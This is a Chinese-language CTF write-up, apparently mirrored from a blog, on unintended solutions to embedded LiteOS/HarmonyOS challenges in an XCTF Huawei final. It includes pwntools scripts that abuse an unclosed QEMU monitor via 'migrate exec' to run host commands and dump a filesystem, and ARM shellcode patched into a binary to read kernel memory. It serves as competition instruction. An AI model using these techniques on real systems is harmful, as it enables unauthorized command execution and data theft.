XCTF 华为高校挑战赛决赛 嵌入式赛题 非预期解

 2 years ago
source link: https://xuanxuanblingbling.github.io/ctf/pwn/2022/09/19/harmony/
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neoserver,ios ssh client




所有的启动脚本中,qemu都没有关monitor(-monitor /dev/null):

./qemu-system-arm -M hi3518 -kernel liteos.bin -nographic


from pwn import *

io =remote("",9999)


  • 解包工具:jefferson
  • 解包用法:jefferson rootfs.img -d ./xxx
  • 固件打包: mkfs.jffs2 -d ./xxx -o rootfs.img



from pwn import *

io =remote("",9999)
io.sendlineafter("(qemu) ",'migrate "exec: strings /rootfs.img | grep flag"')


本题的文件系统strings后没有flag结果,分析程序,flag应该在远程文件系统中的cards文件夹中,所以想办法把远程的rootfs.img dump下来即可。首先将其base64编码:

migrate "exec: base64 rootfs.img > /tmp/1.txt 1>&2"


from pwn import *

for j in range(0,13):
    io =remote("",9999)
    f = open(str( j*100 ),'wb')
    for i in range(j*100,(j+1)*100):
        io.sendlineafter("(qemu)",'migrate "exec: cat /tmp/1.txt | tail -n +%s | head -n 100 1>&2"'%str(i*100))
        a = io.recvuntil("tail: error writing")
        if a[-19:] == b'tail: error writing':
            print('[+] %s / 1205' % str(i))


➜  cd ./cards 
➜  grep -r "flag" ./


虽然本题的qemu也没有关monitor,但无法和qemu直接交互,交互的方式为发送base64编码的HTTP请求,然后由题目脚本转发给题目的webserver。不过发现远程直接发base64编码的GET / HTTP/1.1\n\n发现回包中本身就含有hacked,而题目检查回包中有hacked就打印flag:

#!/usr/bin/env python3
import socket
import base64
import os
import time
import atexit

def exit_handler():
    os.system("kill -9 `pidof qemu-system-arm`")

HOST = ""  # The server's hostname or IP address
PORT = 8008  # The port used by the server

os.system("./start_qemu.sh >/dev/null &")
print("Wait for the server to run up")

def make_request(request_data):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((HOST, PORT))
        print("Waiting for output", flush=True)
        data = s.recv(1024)

    print("Received {}".format(data), flush=True)
    return data

for i in range(2):
    print("Give me your payload: ", flush=True)
    data = input().strip().encode("utf-8")
    data = base64.b64decode(data)

response = make_request(b"GET / HTTP/1.1\n\n")
if b"hacked" in response:
    with open("/flag", "r") as f:
        print(f.read(), flush=True)

因此无论输入什么只要不触发崩溃即可,测试发送base64编码的GET / HTTP/1.1\n\n几次即可:

>>> b64e(b"GET / HTTP/1.1\n\n")




这里readreg的含义应该是读取ARM SoC上的外设寄存器,这些寄存器访问就是通过物理地址。



➜  grep -r "shell commands" ./
Binary file .//liteos.bin matches
Binary file .//liteos matches
➜  file liteos
liteos: ELF 32-bit LSB executable, ARM, statically linked, not stripped


  • harmodriver_revenge:0x40130580
  • drivemecrazy:0x40131580

以harmodriver_revenge为例,在调用readreg 0x40130580 0x20进行调试,因为实现在内核,所以将断点打在shell程序的syscall调用(base+0x4510):

.plt:00004510 syscall 
.plt:00004510      ADRL      R12, 0x4518
.plt:00004518      LDR       PC, [R12,#(off_5164 - 0x4518)]!

调试方法如两年前所写:XCTF华为鸿蒙专场 HARMOFS01


执行readreg 0x40130580 100,断点断下,查看参数寄存器,发现shell命令的系统调用号为0x206,命令直接用字符串传递:

pwndbg> p /x $r0
$1 = 0x206
pwndbg> x /s $r1
0x242d4aa0:	"readreg"
pwndbg> x /s $r2
0x242d4a80:	"readreg 0x40130580 100"


.text:0006AB14 syscall
.text:0006AB2C            MOV      R7, R0
.text:0006AB34            MOV      R0, R1
.text:0006AB48            MOV      R1, R2
.text:0006AB60            SVC      0


from pwn import *

shellcode = asm('''
mov r7,0x206
adr r0,readreg
adr r1,cmd
svc 0

.asciz  "readreg"

.asciz "readreg 0x40130580 100"



from pwn import *

shellcode = asm('''
mov r7,0x206
adr r0,readreg
adr r1,cmd
svc 0

.asciz  "readreg"

.asciz "readreg 0x40130580 100"


stub = open('./camera_app','rb').read()
exp  = stub[:0x1154]+shellcode+stub[0x1154+len(shellcode):]


OHOS # ./exp
 0x40130580 :67616c66 6968547b 73692073 726f6620 
 0x40130590 :73657420 00007d74 00000000 00000000 
 0x401305a0 :00000000 00000000 4006a2cc 00000000 
 0x401305b0 :00000000 00000000 400ec6ec 401305c8 
 0x401305c0 :4026b8bc 7fffffff 400de6b0 400f84dc 
 0x401305d0 :00000000 00000000 00000002 40300bfc 
 0x401305e0 :4006be2c 


from pwn import *

exp = open("./exp",'rb').read().hex()
io = remote("",9999)






[DEBUG] Received 0xa84 bytes:
00000000  2e 2f 70 77  6e 0d 0d 0a  1b 5b 31 3b  33 31 6d 4f  │./pw│n···│·[1;│31mO│
00000010  48 4f 53 20  23 20 1b 5b  30 6d 0d 0d  0a 20 30 78  │HOS │# ·[│0m··│· 0x│
00000020  34 30 31 33  30 35 38 30  20 3a 36 37  36 31 36 63  │4013│0580│ :67│616c│
00000030  36 36 20 37  32 36 31 34  38 37 62 20  37 32 34 34  │66 7│2614│87b │7244│
00000040  36 66 36 64  20 36 35 37  32 35 66 36  39 20 0d 0d  │6f6d│ 657│25f6│9 ··│
00000050  0a 20 30 78  34 30 31 33  30 35 39 30  20 3a 34 37  │· 0x│4013│0590│ :47│
00000060  36 65 36 35  37 36 20 30  30 30 30 37  64 34 35 20  │6e65│76 0│0007│d45 │
00000070  30 30 30 30  30 30 30 30  20 30 30 30  30 30 30 30  │0000│0000│ 000│0000│
00000080  30 20 0d 0d  0a 20 30 78  34 30 31 33  30 35 61 30  │0 ··│· 0x│4013│05a0│
00000090  20 3a 30 30  30 30 30 30  30 30 20 30  30 30 30 30  │ :00│0000│00 0│0000│
000000a0  30 30 30 20  34 30 30 36  61 32 63 63  20 30 30 30  │000 │4006│a2cc│ 000│
000000b0  30 30 30 30  30 20 0d 0d  0a 20 30 78  34 30 31 33  │0000│0 ··│· 0x│4013│
000000c0  30 35 62 30  20 3a 30 30  30 30 30 30  30 30 20 30  │05b0│ :00│0000│00 0│
000000d0  30 30 30 30  30 30 30 20  34 30 30 65  63 36 64 61  │0000│000 │400e│c6da│
000000e0  20 34 30 31  33 30 35 63  38 20 0d 0d  0a 20 30 78  │ 401│305c│8 ··│· 0x│
000000f0  34 30 31 33  30 35 63 30  20 3a 34 30  32 36 62 38  │4013│05c0│ :40│26b8│
00000100  62 63 20 37  66 66 66 66  66 66 66 20  34 30 30 64  │bc 7│ffff│fff │400d│
00000110  65 36 62 30  20 34 30 30  66 38 34 64  63 20 0d 0d  │e6b0│ 400│f84d│c ··│
00000120  0a 20 30 78  34 30 31 33  30 35 64 30  20 3a 30 30  │· 0x│4013│05d0│ :00│
00000130  30 30 30 30  30 30 20 30  30 30 30 30  30 30 30 20  │0000│00 0│0000│000 │
00000140  30 30 30 30  30 30 30 32  20 34 30 33  30 30 62 66  │0000│0002│ 403│00bf│
00000150  63 20 0d 0d  0a 20 30 78  34 30 31 33  30 35 65 30  │c ··│· 0x│4013│05e0│
00000160  20 3a 34 30  30 36 62 65  32 63 20 0d  0d 0a 0d 0d  │ :40│06be│2c ·│····│
00000170  0a 2a 2a 2a  2a 2a 2a 2a  2a 2a 2a 2a  2a 2a 2a 2a  │·***│****│****│****│
00000180  2a 2a 2a 2a  2a 2a 2a 2a  2a 2a 2a 2a  2a 2a 2a 2a  │****│****│****│****│


flag = bytes.fromhex('''
2e 2f 70 77  6e 0d 0d 0a  1b 5b 31 3b  33 31 6d 4f
48 4f 53 20  23 20 1b 5b  30 6d 0d 0d  0a 20 30 78
34 30 31 33  30 35 38 30  20 3a 36 37  36 31 36 63
36 36 20 37  32 36 31 34  38 37 62 20  37 32 34 34
36 66 36 64  20 36 35 37  32 35 66 36  39 20 0d 0d
0a 20 30 78  34 30 31 33  30 35 39 30  20 3a 34 37
36 65 36 35  37 36 20 30  30 30 30 37  64 34 35 20
30 30 30 30  30 30 30 30  20 30 30 30  30 30 30 30
30 20 0d 0d  0a 20 30 78  34 30 31 33  30 35 61 30
20 3a 30 30  30 30 30 30  30 30 20 30  30 30 30 30
30 30 30 20  34 30 30 36  61 32 63 63  20 30 30 30
30 30 30 30  30 20 0d 0d  0a 20 30 78  34 30 31 33
30 35 62 30  20 3a 30 30  30 30 30 30  30 30 20 30
30 30 30 30  30 30 30 20  34 30 30 65  63 36 64 61
20 34 30 31  33 30 35 63  38 20 0d 0d  0a 20 30 78
34 30 31 33  30 35 63 30  20 3a 34 30  32 36 62 38
62 63 20 37  66 66 66 66  66 66 66 20  34 30 30 64
65 36 62 30  20 34 30 30  66 38 34 64  63 20 0d 0d
0a 20 30 78  34 30 31 33  30 35 64 30  20 3a 30 30
30 30 30 30  30 30 20 30  30 30 30 30  30 30 30 20
30 30 30 30  30 30 30 32  20 34 30 33  30 30 62 66
63 20 0d 0d  0a 20 30 78  34 30 31 33  30 35 65 30
20 3a 34 30  30 36 62 65  32 63 20 0d  0d 0a 0d 0d
0a 2a 2a 2a  2a 2a 2a 2a  2a 2a 2a 2a  2a 2a 2a 2a
2a 2a 2a 2a  2a 2a 2a 2a  2a 2a 2a 2a  2a 2a 2a 2a
'''.replace(" ","").replace("\n",""))


➜  python3 flag.py
 0x40130580 :67616c66 7261487b 72446f6d 65725f69 
 0x40130590 :476e6576 00007d45 00000000 00000000 
 0x401305a0 :00000000 00000000 4006a2cc 00000000 
 0x401305b0 :00000000 00000000 400ec6da 401305c8 
 0x401305c0 :4026b8bc 7fffffff 400de6b0 400f84dc 
 0x401305d0 :00000000 00000000 00000002 40300bfc 
 0x401305e0 :4006be2c 



l = ["67616c66","7261487b","72446f6d","65725f69","476e6576","00007d45"]
f = b''
for i in l:
    f += bytes.fromhex(i)[::-1]



[DEBUG] Received 0xa84 bytes:
00000000  2e 2f 70 77  6e 0d 0d 0a  1b 5b 31 3b  33 31 6d 4f  │./pw│n···│·[1;│31mO│
00000010  48 4f 53 20  23 20 1b 5b  30 6d 0d 0d  0a 20 30 78  │HOS │# ·[│0m··│· 0x│
00000020  34 30 31 33  31 35 38 30  20 3a 36 37  36 31 36 63  │4013│1580│ :67│616c│
00000030  36 36 20 37  32 36 31 34  38 37 62 20  36 34 36 38  │66 7│2614│87b │6468│
00000040  36 66 36 64  20 36 39 37  32 34 34 36  36 20 0d 0d  │6f6d│ 697│2446│6 ··│
00000050  0a 20 30 78  34 30 31 33  31 35 39 30  20 3a 34 33  │· 0x│4013│1590│ :43│
00000060  36 35 36 64  37 36 20 37  34 37 30 37  39 37 32 20  │656d│76 7│4707│972 │
00000070  37 64 37 39  37 61 36 66  20 30 30 30  30 30 30 30  │7d79│7a6f│ 000│0000│
00000080  30 20 0d 0d  0a 20 30 78  34 30 31 33  31 35 61 30  │0 ··│· 0x│4013│15a0│
00000090  20 3a 30 30  30 30 30 30  30 30 20 30  30 30 30 30  │ :00│0000│00 0│0000│
000000a0  30 30 30 20  30 30 30 30  30 30 30 30  20 30 30 30  │000 │0000│0000│ 000│
000000b0  30 30 30 30  30 20 0d 0d  0a 20 30 78  34 30 31 33  │0000│0 ··│· 0x│4013│
000000c0  31 35 62 30  20 3a 30 30  30 30 30 30  30 30 20 30  │15b0│ :00│0000│00 0│
000000d0  30 30 30 30  30 30 30 20  34 30 30 36  61 32 64 38  │0000│000 │4006│a2d8│
000000e0  20 30 30 30  30 30 30 30  30 20 0d 0d  0a 20 30 78  │ 000│0000│0 ··│· 0x│
000000f0  34 30 31 33  31 35 63 30  20 3a 30 30  30 30 30 30  │4013│15c0│ :00│0000│
00000100  30 30 20 30  30 30 30 30  30 30 30 20  34 30 30 65  │00 0│0000│000 │400e│
00000110  64 37 37 39  20 34 30 31  33 31 35 64  38 20 0d 0d  │d779│ 401│315d│8 ··│
00000120  0a 20 30 78  34 30 31 33  31 35 64 30  20 3a 34 30  │· 0x│4013│15d0│ :40│
00000130  32 36 63 63  30 30 20 37  66 66 66 66  66 66 66 20  │26cc│00 7│ffff│fff │
00000140  34 30 30 64  66 36 63 66  20 34 30 30  66 39 36 32  │400d│f6cf│ 400│f962│
00000150  63 20 0d 0d  0a 20 30 78  34 30 31 33  31 35 65 30  │c ··│· 0x│4013│15e0│
00000160  20 3a 30 30  30 30 30 30  30 30 20 0d  0d 0a 0d 0d  │ :00│0000│00 ·│····│
00000170  0a 2a 2a 2a  2a 2a 2a 2a  2a 2a 2a 2a  2a 2a 2a 2a  │·***│****│****│****│
l = ["67616c66","7261487b","64686f6d","69724466","43656d76","74707972","7d797a6f"]
f = b''
for i in l:
    f += bytes.fromhex(i)[::-1]

About Joyk

Aggregate valuable and interesting links.
Joyk means Joy of geeK